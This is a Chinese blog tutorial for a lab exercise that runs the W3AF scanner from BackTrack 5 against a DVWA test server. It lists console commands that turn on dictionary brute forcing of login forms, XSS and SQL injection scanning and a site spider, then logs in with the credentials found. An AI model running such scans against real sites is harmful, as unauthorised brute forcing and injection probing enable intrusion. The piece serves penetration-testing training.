版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创!
恰饭广告
实验之前请先阅读这篇文章:(https://www.idaobin.com/explain)
任务描述:
使用W3AF工具扫描测试,实现代码清单4-4,4-5效果P156
任务环境说明:
攻击机:BT5
靶机:Web 服务器靶机
攻击机安装服务/工具1:W3AF
攻击机安装服务/工具2:
攻击机安装服务/工具3:
攻击机安装服务/工具4:
实现步骤:
1. 启动W3AF
cd /pentest/web/w3af/
./w3af_console
2. 代码清单4-4和4-5;W3AF的基本配置与使用
plugins bruteforce bruteforce formAuthBrute bruteforce config formAuthBrute set passwdFile true set userFile true back audit xss,sqli discovery webSpider discovery config webSpider set onlyForward True back back target set target http://10.10.10.129/dvwa/index.php back plugins output htmlFile output config htmlFile set verbose True set fileName aa.html start exit
参数:
plugins 进入插件模块
bruteforce插件 使用有关远程web的应用程序进行自动爬取登录并强制使用
bruteforce formAuthBrute插件 强制形成身份验证登录(暴力破解表单认证页面)
bruteforce config formAuthBrute 进入配置formAuthBrute模块 凡遇到认证页面都会调用字典进行暴力破解
set passwdFile true 设置调用密码字典
set userFile true 设置调用用户名字典
back 返回上一个模块
audit xss,sqli 配置对SQL的注入和XSS漏洞的扫描
discovery webSpider 启动webSpider插件(webSpider插件用于爬取网站中的每个页面)
discovery config webSpider 对webSpider插件的配置
set onlyForward True 设置爬取域名下的具体某个页面 false为爬取域名下的所有页面
target 进入配置域名或ip地址的模块
set target http://10.10.10.129/dvwa/index.php 设置目标地址
output htmlFile 将扫描结果储存为文件
output config htmlFile 对扫描结果的储存形式进行配置
set verbose True 设置运行时显示详细信息
set fileName aa.html 设置储存文件为aa.html并储存在W3Af的主目录下
start 根据以上配置进行扫描
exit 退出W3AF
3. 将扫描结果的储存文件用浏览器打开
在W3AF的主目录下输入firefox aa.html,火狐浏览器弹出aa.html页面
firefox aa.html
打开页面如下
4. 打开网站dvwa应用的后台登录地址
输入扫描结果提供的用户名和密码进行登录后 返回以下提示信息
原文链接:https://www.idaobin.com/archives/660.html
让我恰个饭吧.ヘ( ̄ω ̄ヘ)
恰饭广告